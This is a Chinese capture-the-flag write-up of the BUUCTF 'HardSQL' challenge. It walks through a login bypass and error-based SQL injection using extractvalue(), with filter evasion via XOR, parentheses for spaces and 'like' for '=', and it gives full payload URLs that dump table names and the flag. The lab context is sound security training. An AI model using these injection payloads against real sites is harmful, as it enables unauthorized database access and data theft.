[极客大挑战 2019]HardSQL
先尝试登录,查看报错信息
- admin =111 password =1111 登录失败
- admin =111 password =1’or’1 登录成功
这里直接试了万能密码成功,复习一下,第一个 ’ 是为了闭合前面的sql语句,最后的1后面没有 ’ 是因为默认情况下,通常sql语句会以’ 结尾,我们注入的是’1,实际解析出来就是’1’,不会报错。
参考文章:万能密码‘or’的原理
然后尝试将 or 后面的1换成查库、查表、等等查询语句,提示显然被过滤了,卡住
做不出来,搜wp,SQL注入通常的思路是联合查询,如果尝试都被过滤,或者查询不到任何内容,那应该要考虑“报错注入”的方式。
SQL注入之报错注入
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
BUUCTF-[极客大挑战 2019]HardSQL 1详解
报错注入通常是利用非法语句产生报错并返回报错的内容,当报错一般会返回报错的内容是什么,当返回内容为SQL语句的时候,SQL那边的解析器会自动解析该SQL语句,就造成了SQL语句的任意执行
此题尝试使用
extractvalue(xml_document.Xpath_string)
作用:
查询一个名叫“xml_document”的文档
路径为“Xpath_string”
构造注入语句
extractvalue(1,concat(‘0x7e’,select(database())))%23
'or extractvalue() 中间的这个空格也会被过滤,再查wp
用’^'来连接函数,形成异或
?username=111&password=1111'^extractvalue
失败,检查一下括号少了,(select(database()))要括起来
爆出库名:geek
爆破表名,sql语句之间的空格用()代替,=号用like代替,构造:
?username=111&password=1111'^extractvalue(1,concat('0x7e',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek"))))%23
表名:H4rDsq1
爆破字段内容:
select group_concat(column_name) from information_schema.columns where table_schema=database()
#这里原代码表名变量叫'table_schema',但本题中必须输入'table_name',检查半天非常无语
?username=111&password=111'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1"))))%23
继续查找flag:
?username=111&password=111'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)where(id)like(1))))%23
获得:flag{327111be-7867-495c-872d-51
‘}’不见了,flag应该还有一半未显示
使用right(value,str_length)函数
?username=111&password=111’^extractvalue(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)where(id)like(1))))%23
获得:e-7867-495c-872d-511f0cc4fc08}
拼接flag{327111be-7867-495c-872d-51e-7867-495c-872d-511f0cc4fc08}
提交错误
中间应该还有几个字符,调整right函数的第二个参数控制显示长度,后半部分是‘7111be’开头
才发现这个flag很短。。
flag{327111be-7867-495c-872d-511f0cc4fc08}
提交正确
